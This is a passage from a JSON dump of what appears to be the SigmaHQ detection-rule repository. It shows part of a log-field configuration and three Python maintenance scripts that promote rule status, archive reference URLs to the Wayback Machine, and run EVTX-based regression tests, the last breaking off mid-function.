       \"category\":{\n                \"process_creation\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"FileVersion\", \"Description\", \"Product\", \"Company\", \"OriginalFileName\",\n                                    \"CommandLine\", \"CurrentDirectory\", \"User\", \"LogonGuid\", \"LogonId\", \"TerminalSessionId\", \"IntegrityLevel\", \"Hashes\",\n                                    \"ParentProcessGuid\", \"ParentProcessId\", \"ParentImage\", \"ParentCommandLine\", \"ParentUser\"],\n                \"network_connection\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"User\", \"Protocol\", \"Initiated\", \"SourceIsIpv6\", \"SourceIp\", \"SourceHostname\",\n                                    \"SourcePort\", \"SourcePortName\", \"DestinationIsIpv6\", \"DestinationIp\", \"DestinationHostname\", \"DestinationPort\",\n                                    \"DestinationPortName\"],\n                \"process_termination\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"User\"],\n                \"raw_access_read\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"Device\", \"User\"],\n                \"file_event\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"TargetFilename\", \"CreationUtcTime\", \"User\"],\n                \"sysmon_status\": [\"Configuration\", \"ConfigurationFileHash\"],\n                \"file_delete\": [\"ProcessGuid\", \"ProcessId\", \"User\", \"Image\", \"TargetFilename\", \"Hashes\", \"IsExecutable\", \"Archived\"]\n            },\n            \"service\":{\n                \"auditd\": [\"a0\", \"a1\", \"a2\", \"a3\", \"a4\", \"a5\", \"a6\", \"a7\", \"a8\", \"a9\",\n                    \"acct\", \"acl\", \"action\", \"added\", \"addr\", \"apparmor\", \"arch\", \"argc\", \"audit_backlog_limit\", \"audit_backlog_wait_time\",\n                    \"audit_enabled\", \"audit_failure\", \"auid\", \"banners\", \"bool\", \"bus\", \"cap_fe,cap_fi\", \"cap_fp\", \"cap_fver\", \"cap_pa\", \"cap_pe\", \"cap_pi\",\n                    \"cap_pp\", \"capability\", \"category\", \"cgroup\", \"changed\", \"cipher\", \"class\", \"cmd\", \"code\", \"comm\", \"compat\", \"cwd\", \"daddr\", \"data\",\n                    \"default-context\", \"dev\", \"dev\", \"device\", \"dir\", \"direction\", \"dmac\", \"dport\", \"egid\", \"enforcing\", \"entries\", \"errno\", \"euid\", \"exe\",\n                    \"exit\", \"fam\", \"family\", \"fd\", \"fe\", \"feature\", \"fi\", \"file\", \"flags\", \"format\", \"fp\", \"fsgid\", \"fsuid\", \"fver\", \"gid\", \"grantors\", \"grp\",\n                    \"hook\", \"hostname\", \"icmp_type\", \"id\", \"igid\", \"img-ctx\", \"inif\", \"ino\", \"inode\", \"inode_gid\", \"inode_uid\", \"invalid_context\", \"ioctlcmd\",\n                    \"ip\", \"ipid\", \"ipx-net\", \"item\", \"items\", \"iuid\", \"kernel\", \"key\", \"kind\", \"ksize\", \"laddr\", \"len\", \"list\", \"lport\", \"mac\", \"macproto\", \"maj\",\n                    \"major\", \"minor\", \"mode\", \"model\", \"msg\", \"name\", \"nametype\", \"nargs\", \"net\", \"new\", \"new_gid\", \"new_lock\", \"new_pe\", \"new_pi\", \"new_pp\",\n                    \"new-chardev\", \"new-disk\", \"new-enabled\", \"new-fs\", \"new-level\", \"new-log_passwd\", \"new-mem\", \"new-net\", \"new-range\", \"new-rng\", \"new-role\",\n                    \"new-seuser\", \"new-vcpu\", \"nlnk-fam\", \"nlnk-grp\", \"nlnk-pid\", \"oauid\", \"obj\", \"obj_gid\", \"obj_uid\", \"ocomm\", \"oflag\", \"ogid\", \"old\", \"old_enforcing\",\n                    \"old_lock\", \"old_pa\", \"old_pe\", \"old_pi\", \"old_pp\", \"old_prom\", \"old_val\", \"old-auid\", \"old-chardev\", \"old-disk\", \"old-enabled\", \"old-fs\",\n                    \"old-level\", \"old-log_passwd\", \"old-mem\", \"old-net\", \"old-range\", \"old-rng\", \"old-role\", \"old-ses\", \"old-seuser\", \"old-vcpu\", \"op\", \"opid\",\n                    \"oses\", \"ouid\", \"outif\", \"pa\", \"parent\", \"path\", \"pe\", \"per\", \"perm\", \"perm_mask\", \"permissive\", \"pfs\", \"pi\", \"pid\", \"pp\", \"ppid\", \"printer\",\n                    \"proctitle\", \"prom\", \"proto\", \"qbytes\", \"range\", \"rdev\", \"reason\", \"removed\", \"res\", \"resrc\", \"result\", \"role\", \"rport\", \"saddr\", \"sauid\",\n                    \"scontext\", \"selected-context\", \"seperm\", \"seperms\", \"seqno\", \"seresult\", \"ses\", \"seuser\", \"sgid\", \"sig\", \"sigev_signo\", \"smac\", \"spid\",\n                    \"sport\", \"state\", \"subj\", \"success\", \"suid\", \"syscall\", \"SYSCALL\", \"table\", \"tclass\", \"tcontext\", \"terminal\", \"tty\", \"type\", \"uid\", \"unit\", \"uri\", \"user\",\n                    \"uuid\", \"val\", \"val\", \"ver\", \"virt\", \"vm\", \"vm-ctx\", \"vm-pid\", \"watch\"],\n                \"vsftpd\":[],\n                \"sshd\":[],\n                \"syslog\":[],\n                \"guacamole\":[],\n                \"auth\":[],\n                \"clamav\":[],\n                \"modsecurity\":[],\n                \"sudo\":[],\n                \"cron\":[]\n            }\n        },\n        \"empty\":{\n            \"common\": [],\n            \"empty\": [\"not_found\"],\n            \"category\":{\n                \"proxy\":[\"c-uri\", \"c-uri-extension\", \"c-uri-query\", \"c-uri-stem\", \"c-useragent\", \"cs-bytes\", \"cs-cookie\",\n                        \"cs-host\", \"cs-method\", \"cs-uri-stem\", \"r-dns\", \"cs-referrer\", \"cs-version\", \"sc-bytes\", \"sc-status\", \"src_ip\", \"dst_ip\",\n                        \"cs-uri\"],\n                \"webserver\":[\"date\", \"time\", \"c-ip\", \"cs-username\", \"s-sitename\", \"s-computername\", \"s-ip\", \"cs-method\",\n                            \"cs-uri-stem\", \"cs-uri-query\", \"s-port\", \"cs-method\", \"sc-status\", \"sc-win32-status\",\n                            \"sc-bytes\", \"cs-bytes\", \"time-taken\", \"cs-version\", \"cs-host\", \"cs-user-agent\",\n                            \"cs-referer\", \"cs-cookie\"],\n                \"antivirus\":[],\n                \"database\":[],\n                \"dns\":[],\n                \"firewall\":[]\n            },\n            \"service\":{\n                \"apache\":[],\n                \"netflow\":[],\n                \"nginx\":[]\n            }\n        },\n        \"cisco\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"aaa\":[],\n                \"bgp\":[],\n                \"duo\":[],\n                \"ldp\":[],\n                \"syslog\":[]\n            }\n        },\n        \"fortigate\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"event\":[\"devname\",\"devid\",\"logid\",\"type\",\"subtype\",\"level\",\"vd\",\"logdesc\",\"user\",\"ui\",\"action\",\"cfgtid\",\"cfgpath\",\"cfgobj\",\"cfgattr\",\"msg\"]\n            }\n        },\n        \"fortios\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"sslvpnd\": []\n            }\n        },\n        \"paloalto\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"file_event\": []\n            },\n            \"service\":{\n                \"globalprotect\": []\n            }\n        },\n        \"django\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"kubernetes\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{\n                \"audit\": []\n            }\n        },\n        \"python\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"qualys\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"rpc_firewall\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"ruby_on_rails\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"modsecurity\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"spring\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"sql\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"jvm\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"nodejs\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"opencanary\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"velocity\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"aws\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"cloudtrail\":[]\n            }\n        },\n        \"azure\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"activitylogs\":[],\n                \"auditlogs\":[],\n\t\t\t\t\"riskdetection\":[],\n\t\t\t\t\"pim\":[],\n                \"signinlogs\":[]\n            }\n        },\n        \"gcp\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"gcp.audit\":[],\n                \"google_workspace.admin\":[]\n            }\n        },\n        \"github\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"audit\":[]\n            }\n        },\n        \"bitbucket\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"audit\":[]\n            }\n        },\n        \"m365\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"audit\":[],\n                \"exchange\":[],\n                \"threat_detection\":[],\n                \"threat_management\":[]\n            }\n        },\n        \"okta\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"okta\":[]\n            }\n        },\n        \"onelogin\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"onelogin.events\":[]\n            }\n        },\n        \"huawei\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"bgp\":[]\n            }\n        },\n        \"juniper\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"bgp\":[]\n            }\n        },\n        \"zeek\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n            },\n            \"service\":{\n                \"kerberos\":[],\n                \"smb_files\":[],\n                \"rdp\":[],\n                \"http\":[],\n                \"dns\":[],\n                \"dce_rpc\":[],\n                \"x509\":[]\n            }\n        },\n        \"macos\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"process_creation\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"FileVersion\", \"Description\", \"Product\", \"Company\", \"OriginalFileName\",\n                                    \"CommandLine\", \"CurrentDirectory\", \"User\", \"LogonGuid\", \"LogonId\", \"TerminalSessionId\", \"IntegrityLevel\", \"Hashes\",\n                                    \"ParentProcessGuid\", \"ParentProcessId\", \"ParentImage\", \"ParentCommandLine\", \"ParentUser\"],\n                \"network_connection\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"User\", \"Protocol\", \"Initiated\", \"SourceIsIpv6\", \"SourceIp\", \"SourceHostname\",\n                                    \"SourcePort\", \"SourcePortName\", \"DestinationIsIpv6\", \"DestinationIp\", \"DestinationHostname\", \"DestinationPort\",\n                                    \"DestinationPortName\"],\n                \"process_termination\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"User\"],\n                \"raw_access_read\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"Device\", \"User\"],\n                \"file_event\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"TargetFilename\", \"CreationUtcTime\", \"User\"],\n                \"sysmon_status\": [\"Configuration\", \"ConfigurationFileHash\"],\n                \"file_delete\": [\"ProcessGuid\", \"ProcessId\", \"User\", \"Image\", \"TargetFilename\", \"Hashes\", \"IsExecutable\", \"Archived\"]\n            },\n            \"service\":{\n            }\n        }    \n    },\n    \"addon\":{\n        \"windows\":{\n            \"category\":{\n                \"process_creation\": [\"GrandparentCommandLine\"],\n                \"network_connection\": [\"CommandLine\", \"ParentImage\"],\n                \"create_remote_thread\": [\"User\", \"SourceCommandLine\", \"SourceParentProcessId\", \"SourceParentImage\",\n                                    \"SourceParentCommandLine\", \"TargetCommandLine\", \"TargetParentProcessId\", \"TargetParentImage\", \"TargetParentCommandLine\",\n                                    \"IsInitialThread\", \"RemoteCreation\"],\n                \"file_delete\": [\"CommandLine\", \"ParentImage\", \"ParentCommandLine\"],\n                \"file_event\": [\"CommandLine\", \"IntegrityLevel\", \"MagicHeader\", \"ParentCommandLine\", \"ParentImage\"],\n                \"image_load\": [\"CommandLine\"],\n                \"process_access\": [\"SourceCommandLine\", \"CallTraceExtended\"],\n                \"file_access\":[\"Image\", \"CommandLine\", \"ParentImage\", \"ParentCommandLine\", \"User\", \"TargetFilename\"],\n                \"file_rename\":[\"Image\", \"CommandLine\", \"ParentImage\", \"ParentCommandLine\", \"User\", \"OriginalFileName\", \"SourceFilename\", \"TargetFilename\", \"MagicHeader\"]\n            },\n            \"service\":{}\n        },\n        \"empty\":{\n            \"category\":{\n                \"webserver\": [\"cs-content-type\"]\n               },\n            \"service\":{}\n        }\n    }\n}"
  },
  {
    "path": "tests/promote_rules_status.py",
    "content": "from datetime import datetime\nfrom sigma.collection import SigmaCollection\n\npath_to_rules = [\n    \"rules\",\n    \"rules-emerging-threats\",\n    \"rules-placeholder\",\n    \"rules-threat-hunting\",\n    \"rules-compliance\",\n]\nnb_days = 300\n\n\ndef get_rules_to_promote():\n    today = datetime.now().date()\n    rules_to_promote = []\n\n    rule_paths = SigmaCollection.resolve_paths(path_to_rules)\n    rule_collection = SigmaCollection.load_ruleset(rule_paths, collect_errors=True)\n    for sigmaHQrule in rule_collection:\n        if str(sigmaHQrule.status) == \"experimental\":\n            last_update = (\n                sigmaHQrule.modified if sigmaHQrule.modified else sigmaHQrule.date\n            )\n            difference = (today - last_update).days\n            if difference >= nb_days:\n                rules_to_promote.append(sigmaHQrule.source.path)\n\n    return rules_to_promote\n\n\ndef promote_rules(rules_to_promote):\n    for file_ in rules_to_promote:\n        with open(file_, \"r\", encoding=\"utf8\") as f:\n            data = f.read().replace(\"\\nstatus: experimental\", \"\\nstatus: test\")\n\n        with open(file_, \"w\", encoding=\"utf8\") as f:\n            f.write(data)\n\n\nif __name__ == \"__main__\":\n    rules_to_promote = get_rules_to_promote()\n    promote_rules(rules_to_promote)\n"
  },
  {
    "path": "tests/reference-archiver.py",
    "content": "# Author:\n#    Martin Spielmann / KION Group IT\n#    Nasreddine Bencherchali / Nextron Systems\n\n__version__ = \"0.0.1\"\n\nimport time\nimport requests\nimport yaml\nimport os\nfrom datetime import datetime\nfrom typing import Generator\n\n\nWEB_ARCHIVE_SAVE_URL = \"https://web.archive.org/save/\"\nWEB_ARCHIVE_GET_URL = \"https://web.archive.org/web/\"\n\nwith open(\"tests/rule-references.txt\", \"r\") as f:\n    RULE_REFERENCES = [i.strip() for i in f.readlines()]\n\npath_to_rules = [\n    \"rules\",\n    \"rules-emerging-threats\",\n    \"rules-placeholder\",\n    \"rules-threat-hunting\",\n    \"rules-compliance\",\n]\n\n\n# Helper functions\ndef yield_next_rule_file_path(path_to_rules: list) -> Generator[str, None, None]:\n    for path_ in path_to_rules:\n        for root, _, files in os.walk(path_):\n            for file in files:\n                if file.endswith(\".yml\"):\n                    yield os.path.join(root, file)\n\n\ndef get_rule_part(file_path: str, part_name: str):\n    yaml_dicts = get_rule_yaml(file_path)\n    for yaml_part in yaml_dicts:\n        if part_name in yaml_part.keys():\n            return yaml_part[part_name]\n\n    return None\n\n\ndef get_rule_yaml(file_path: str) -> dict:\n    data = []\n\n    with open(file_path, encoding=\"utf-8\") as f:\n        yaml_parts = yaml.safe_load_all(f)\n        for part in yaml_parts:\n            data.append(part)\n\n    return data\n\n\ndef get_references(path_to_rules):\n    ref_list = []\n\n    for file in yield_next_rule_file_path(path_to_rules):\n        references = get_rule_part(file_path=file, part_name=\"references\")\n        if references:\n            for ref in references:\n                # To avoid references using \"Internal Research\" or similar\n                if ref.startswith(\"http\"):\n                    ref_list.append(ref)\n    return ref_list\n\n\ndef archive_references(ref_list):\n    error_archiving = []\n    already_archived = []\n    newly_archived_references = []\n\n    for ref in ref_list:\n        try:\n            archive_response = requests.get(url=WEB_ARCHIVE_GET_URL + ref)\n            # If the URL is not yet archived, the Wayback Machine returns a 404 response\n            status_code = archive_response.status_code\n            if status_code in (200, 301, 302):\n                # Already archived\n                already_archived.append(ref)\n                print(\"Reference '{}' is already archived\".format(ref))\n            elif status_code == 403:\n                # Wayback machine does not have permission to access the reference.\n                error_archiving.append(ref)\n                print(\n                    \"Wayback Machine got permission denied in the past, when trying to access reference '{}'. Not archiving.\".format(\n                        ref\n                    )\n                )\n            else:\n                print(\"Reference '{}' is not archived. Archiving...\".format(ref))\n                archive_response = requests.post(url=WEB_ARCHIVE_SAVE_URL + ref)\n                newly_archived_references.append(ref)\n\n            # We sleep so we don't spam the Wayback Machine too much :)\n            time.sleep(1)\n        except:\n            error_archiving.append(ref)\n\n    return already_archived, newly_archived_references, error_archiving\n\n\ndef sort_references(file_path: str):\n    \"\"\"Sort the references in the rule-references.txt file alphabetically.\"\"\"\n    try:\n        with open(file_path, \"r\") as f:\n            references = [line.strip() for line in f.readlines() if line.strip()]\n        \n        # Sort references alphabetically (case-insensitive)\n        references.sort(key=str.lower)\n        \n        # Write the sorted references back to the file\n        with open(file_path, \"w\") as f:\n            for ref in references:\n                f.write(ref + \"\\n\")\n        \n        print(\"References sorted successfully.\")\n        \n    except Exception as e:\n        print(f\"Error sorting references: {e}\")\n\n\nif __name__ == \"__main__\":\n    print(\"Archiving references ...\\n\")\n\n    tmp_ref_list = get_references(path_to_rules)\n\n    # We do an intersection between the full list and the list of references that are already archived\n    ref_list = list(set(tmp_ref_list) - set(RULE_REFERENCES))\n\n    already_archived, newly_archived_references, error_archiving = archive_references(\n        ref_list\n    )\n\n    with open(\"tests/rule-references.txt\", \"a\") as f:\n        for ref in already_archived:\n            f.write(ref)\n            f.write(\"\\n\")\n\n        for ref in newly_archived_references:\n            f.write(ref)\n            f.write(\"\\n\")\n\n    # Sort the references alphabetically at the end\n    print(\"Sorting references...\")\n    sort_references(\"tests/rule-references.txt\")\n\n    # Write markdown output to open the issue\n    with open(\".github/latest_archiver_output.md\", \"w\") as f:\n        f.write(f\"# Reference Archiver Results\\n\\n\")\n        f.write(f\"Last Execution: {datetime.today().strftime('%Y-%m-%d %H:%M:%S')}\\n\\n\")\n        f.write(\"### Archiver Script Results\\n\\n\")\n        f.write(\"\\n#### Newly Archived References\\n\\n\")\n        if newly_archived_references:\n            for ref in newly_archived_references:\n                f.write(f\"- {ref}\\n\")\n        else:\n            f.write(\"N/A\\n\")\n\n        f.write(\"\\n#### Already Archived References\\n\\n\")\n        if already_archived:\n            for ref in already_archived:\n                f.write(f\"- {ref}\\n\")\n        else:\n            f.write(\"N/A\\n\")\n\n        f.write(\"\\n#### Error While Archiving References\\n\\n\")\n        if error_archiving:\n            for ref in error_archiving:\n                f.write(f\"- {ref}\\n\")\n        else:\n            f.write(\"N/A\\n\")\n\n    print(\"\\nDone.\")\n"
  },
  {
    "path": "tests/regression_tests_runner.py",
    "content": "\"\"\"Run regression tests for Sigma rules based on their regression_tests_path attribute.\"\"\"\n\nimport argparse\nimport json\nimport os\nimport subprocess\nimport sys\nfrom typing import Dict, List\n\nimport yaml\n\n\ndef get_absolute_path(base_path: str, relative_path: str) -> str:\n    \"\"\"Convert a relative path to an absolute path based on a base path.\"\"\"\n    if os.path.isabs(relative_path):\n        return relative_path\n\n    # Normalize path separators\n    relative_path = relative_path.replace(\"/\", os.sep).replace(\"\\\\\", os.sep)\n    workspace_root = base_path\n    while not os.path.exists(os.path.join(workspace_root, relative_path)):\n        parent = os.path.dirname(workspace_root)\n        if parent == workspace_root:  # Reached filesystem root\n            break\n        workspace_root = parent\n    return os.path.join(workspace_root, relative_path)\n\n\ndef load_info_yaml(\n    regression_tests_path: str, rule_id: str, file_path: str\n) -> tuple[List[Dict], List[Dict]]:\n    \"\"\"Load and parse the regression test info YAML file.\"\"\"\n    results = []\n    missing_files = []\n\n    if not os.path.exists(regression_tests_path):\n        missing_files.append(\n            {\n                \"rule_path\": file_path,\n                \"rule_id\": rule_id,\n                \"missing_file\": regression_tests_path,\n                \"file_type\": \"regression_tests_path\",\n            }\n        )\n        return results, missing_files\n\n    try:\n        with open(regression_tests_path, \"r\", encoding=\"utf-8\") as f:\n            info_data = yaml.safe_load(f)\n\n        if not info_data or \"regression_tests_info\" not in info_data:\n            print(f\"Warning: No regression_tests_info found in {regression_tests_path}\")\n            return results, missing_files\n\n        # Extract test data from regression_tests_info\n        test_data = []\n        regression_tests = info_data.get(\"regression_tests_info\", [])\n        rule_metadata = info_data.get(\"rule_metadata\", [])\n\n        for test in regression_tests:\n            if not isinstance(test, dict):\n                continue\n\n            test_path = get_absolute_path(\n                os.path.dirname(file_path), test.get(\"path\", \"\")\n            )\n\n            # Check if test file exists\n            if not os.path.exists(test_path):\n                missing_files.append(\n                    {\n                        \"rule_path\": file_path,\n                        \"rule_id\": rule_id,\n                        \"missing_file\": test_path,\n                        \"file_type\": \"test_file\",\n                        \"test_name\": test.get(\"name\", \"Unnamed Test\"),\n                        \"test_type\": test.get(\"type\", \"unknown\"),\n                    }\n                )\n\n            test_data.append(\n                {\n                    \"type\": test.get(\"type\", \"unknown\"),\n                    \"path\": test_path,\n                    \"name\": test.get(\"name\", \"Unnamed Test\"),\n                    \"provider\": test.get(\"provider\", \"\"),\n                }\n            )\n        info_metadata_rule_id = None\n        for metadata_entry in rule_metadata:\n            if not isinstance(metadata_entry, dict):\n                continue\n            info_metadata_rule_id = metadata_entry.get(\"id\", \"\")\n\n        if test_data:\n            results.append(\n                {\n                    \"path\": file_path,\n                    \"id\": rule_id,\n                    \"tests\": test_data,\n                    \"info_metadata_rule_id\": info_metadata_rule_id,\n                }\n            )\n\n    except yaml.YAMLError as e:\n        print(f\"Warning: Could not parse info file {regression_tests_path}: {e}\")\n\n    return results, missing_files\n\n\ndef find_rule_missing_test(rule_data: Dict, file_path: str) -> tuple[bool, List[Dict]]:\n    \"\"\"Find missing test files for a single rule based on its data.\n\n    Returns:\n        skip: True if the rule should be skipped, False otherwise\n        missing_regression_tests_path: List of dicts with missing regression_tests_path info\n\n    \"\"\"\n    missing_regression_tests_path = []\n    rule_id = rule_data.get(\"id\", \"unknown\")\n    rule_status = rule_data.get(\"status\", \"\").lower()\n\n    # Check if rule status requires regression tests\n    requires_regression_tests = rule_status in [\"test\", \"stable\"]\n\n    # Check if rule has regression_tests_path\n    has_regression_tests_path = \"regression_tests_path\" in rule_data\n\n    # If rule requires regression tests but doesn't have regression_tests_path\n    if requires_regression_tests and not has_regression_tests_path:\n        missing_regression_tests_path.append(\n            {\n                \"rule_path\": file_path,\n                \"rule_id\": rule_id,\n                \"status\": rule_status,\n            }\n        )\n        return True, missing_regression_tests_path\n\n    # Skip rules that don't require regression tests\n    # and don't have regression_tests_path\n    if not requires_regression_tests and not has_regression_tests_path:\n        return True, missing_regression_tests_path\n    return False, missing_regression_tests_path\n\n\ndef find_rule_tests(rule_data: Dict, file_path: str) -> tuple[List[Dict], List[Dict]]:\n    \"\"\"Find regression tests and missing files for a single rule based on its data.\"\"\"\n    results = []\n    missing_files = []\n    rule_id = rule_data.get(\"id\", \"unknown\")\n\n    if rule_data and \"regression_tests_path\" in rule_data:\n        regression_tests_path = get_absolute_path(\n            os.path.dirname(file_path),\n            rule_data.get(\"regression_tests_path\", \"\"),\n        )\n\n        # Load the info.yml file\n        yml_result, yml_missing_files = load_info_yaml(\n            regression_tests_path, rule_id, file_path\n        )\n        results.extend(yml_result)\n        missing_files.extend(yml_missing_files)\n    return results, missing_files\n\n\n# pylint: disable=too-many-locals\ndef find_rules_with_tests(\n    rules_paths: List[str],\n) -> tuple[List[Dict], List[Dict], List[Dict]]:\n    \"\"\"Find all rules that have a 'regression_tests_path' attribute pointing to test info files.\n\n    Returns:\n        tuple: (rules_with_tests, missing_files, missing_regression_tests_path)\n    \"\"\"\n    results = []\n    missing_files = []\n    missing_regression_tests_path = []\n\n    for rules_path in rules_paths:\n        if not os.path.exists(rules_path):\n            print(f\"Warning: Rules path {rules_path} does not exist\")\n            continue\n\n        for root, _, files in os.walk(rules_path):\n            for file in files:\n                if not file.endswith(\".yml\"):\n                    continue\n\n                file_path = os.path.join(root, file)\n                try:\n                    with open(file_path, \"r\", encoding=\"utf-8\") as f:\n                        rule_data = yaml.safe_load(f)\n\n                    if not rule_data:\n                        continue\n\n                    # Check for missing regression_tests_path\n                    skip, missing_test = find_rule_missing_test(rule_data, file_path)\n                    missing_regression_tests_path.extend(missing_test)\n                    if skip:\n                        continue\n\n                    # Find tests for the rule\n                    (\n                        result,\n                        missing_file,\n                    ) = find_rule_tests(rule_data, file_path)\n                    results.extend(result)\n                    missing_files.extend(missing_file)\n\n                except yaml.YAMLError as e:\n                    print(f\"Warning: Could not parse {file_path}: {e}\")\n\n    return results, missing_files, missing_regression_tests_path\n\n\ndef run_evtx_checker(\n    rule_path: str,\n    rule_id: str,\n    test_data: Dict,\n    evtx_checker_path: str,\n    thor_config: str,\n) -> tuple[bool, str]:\n    \"\"\"Run evtx-sigma-checker and check if rule ID is in output.\"\"\"\n    evtx_path = test_data[\"path\"]\n\n    # File existence is now checked upfront in find_rules_with_tests\n    # No need to check again here\n\n    cmd = [\n        evtx_checker_path,\n        \"--log-source\",\n        thor_config,\n        \"--evtx-path\",\n        evtx_path,\n        \"--rule-level\",\n        \"informational\",\n        \"--rule-path\",\n        os.path.dirname(rule_path),\n    ]\n\n    try:\n        result = subprocess.run(\n            cmd, capture_output=True, text=True, timeout=300, check=True\n        )\n\n        if result.returncode != 0:\n            print(f\"  Warning: evtx-sigma-checker failed: {result.stderr}\")\n            return False, \"\"\n\n        # Check if rule ID appears in output\n        output_lines = result.stdout.strip().splitlines()\n        found_match = False\n        match_output = \"\"\n\n        for line in output_lines:\n            try:\n                json_obj = json.loads(line)\n                if json_obj.get(\"RuleId\") == rule_id:\n                    found_match = True\n                    match_output = line\n                    break\n            except json.JSONDecodeError:\n                # Skip lines that aren't valid JSON\n                print(f\"  Warning: Skipping non-JSON line: {line}\")\n                continue\n\n        return found_match, match_output\n\n    except subprocess.TimeoutExpired:\n        print(\"  Timeout: evtx-sigma-checker timed out\")\n        return False, \"\"\n    except subprocess.CalledProcessError as e:\n        print(f\"  Error running evtx-sigma-checker: {e}\")\n        if e.stderr:\n            print(f\"  Output: {e.stderr}\")\n        return False, \"\"\n\n\ndef run_test(\n    rule_path: str,\n    rule_id: str,\n    test_data: Dict,\n    evtx_checker_path: str,\n    thor_config: str,\n) -> tuple[bool, str]:\n    \"\"\"Run a test based on its type.\"\"\"\n    test_type = test_data.get(\"type\", \"unknown\")\n\n    if test_type == \"evtx\":\n        return run_evtx_checker(\n            rule_path, rule_id, test_data, evtx_checker_path, thor_config\n        )\n    print(f\"  Warning: Unknown test type '{test_type}', skipping\")\n    return False, \"\"\n\n\ndef parse_arguments() -> argparse.Namespace:\n    \"\"\"Parse command-line arguments.\"\"\"\n    parser = argparse.ArgumentParser(\n        description=\"Run regression tests for Sigma rules with regression_tests_path\"\n    )\n\n    parser.add_argument(\n        \"--rules-paths\",\n        required=True,\n        action=\"extend\",\n        nargs=\"+\",\n        help=\"Comma-separated paths to rule directories\",\n    )\n\n    parser.add_argument(\n        \"--evtx-checker\",\n        help=\"Path to evtx-sigma-checker binary (required unless using --validate-only)\",\n    )\n\n    parser.add_argument(\n        \"--thor-config\",\n        help=\"Path to thor.yml configuration file (required unless using --validate-only)\",\n    )\n\n    parser.add_argument(\n        \"--validate-only\",\n        action=\"store_true\",\n        help=\"Only validate rule status requirements without running tests\",\n    )\n\n    parser.add_argument(\n        \"--ignore-validation\",\n        action=\"store_true\",\n        help=\"Ignore rule status validation requirements\",\n    )\n\n    parser.add_argument(\n        \"--verbose\",\n        action=\"store_true\",\n        help=\"Enable verbose output, showing successful test results as well\",\n    )\n\n    return parser.parse_args()\n\n\ndef init_checks(args: argparse.Namespace) -> None:\n    \"\"\"Initialization that checks for functional environment.\"\"\"\n    if args.validate_only:\n        print(\"Starting Rule Status Validation...\")\n    else:\n        print(\"Starting Regression Tests...\")\n\n        # Check required arguments for test execution\n        if not args.evtx_checker or not args.thor_config:\n            print(\n                \"Error: --evtx-checker and --thor-config are required unless using --validate-only\"\n            )\n            sys.exit(1)\n\n        # Check if evtx-sigma-checker exists\n        if not os.path.exists(args.evtx_checker):\n            print(f\"Error: evtx-sigma-checker not found at {args.evtx_checker}\")\n            sys.exit(1)\n\n        # Check if THOR config exists\n        if not os.path.exists(args.thor_config):\n            print(f\"Error: Thor config not found at {args.thor_config}\")\n            sys.exit(1)\n        print(f\"Rules paths: {args.rules_paths}\")\n\n    if not args.validate_only:\n        print(f\"EVTX checker: {args.evtx_checker}\")\n        print(f\"Thor config: {args.thor_config}\")\n    print()\n\n\n# pylint: disable=too-many-locals\ndef run_tests(\n    args: argparse.Namespace, rules_with_tests\n) -> tuple[int, int, List[Dict]]:\n    \"\"\"Run tests for all rules with test data.\"\"\"\n    total_tests = 0\n    passed_tests = 0\n    failures = 